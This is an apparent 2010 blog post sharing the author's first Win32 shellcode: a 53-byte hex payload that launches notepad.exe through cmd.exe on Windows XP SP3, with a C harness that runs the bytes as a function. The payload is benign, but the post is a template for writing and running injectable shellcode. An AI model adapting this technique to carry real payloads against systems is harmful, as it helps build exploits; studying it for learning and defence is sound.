2010
12.06
12.06
Finally, my first win32 shellcode..
This will execute notepad.exe when loaded. Run on Windows XP SP3 English.
/*
==========================================================================
___ _ __ __ __ _ __
____/ (_)___ _(_) /_____ _/ / ___ _____/ /_ (_)___/ /___ ____ _
/ __ / / __ `/ / __/ __ `/ /_____/ _ \/ ___/ __ \/ / __ / __ \/ __ `/
/ /_/ / / /_/ / / /_/ /_/ / /_____/ __/ /__/ / / / / /_/ / / / / /_/ /
\__,_/_/\__, /_/\__/\__,_/_/ \___/\___/_/ /_/_/\__,_/_/ /_/\__,_/
/____/ http://www.digital-echidna.org
==========================================================================
Title: Windows XP SP3 (EN) 32-bit - notepad.exe shellcode 53 bytes
Author: modpr0be
Tested on: WinXP Pro SP3 (EN) 32 bit - Build 2600.xpsp_sp3_gdr.100427-1636
Greetz:
say hello to all digital-echidna org crew:
otoy, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix
special thx to amalia (^^), offsec, exploit-db, and corelan team
*/
/*shellcodetest.c*/
char code[] = "\x31\xc0\x50\xb8\x72\x75\x11\x11"
"\x2d\x11\x11\x11\x11\x50\x68\x6f"
"\x74\x65\x70\x68\x2f\x63\x20\x6e"
"\x68\x65\x78\x65\x20\x68\x63\x6d"
"\x64\x2e\x89\xe3\x50\x53\xbb"
"\x0d\x25\x86\x7c" /*Kernel32.dll.WinExec*/
"\xff\xd3\x50\xbb"
"\x12\xcb\x81\x7c" /*Kernel32.dll.ExitProcess*/
"\xff\xd3";
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}
No Comment.
Add Your Comment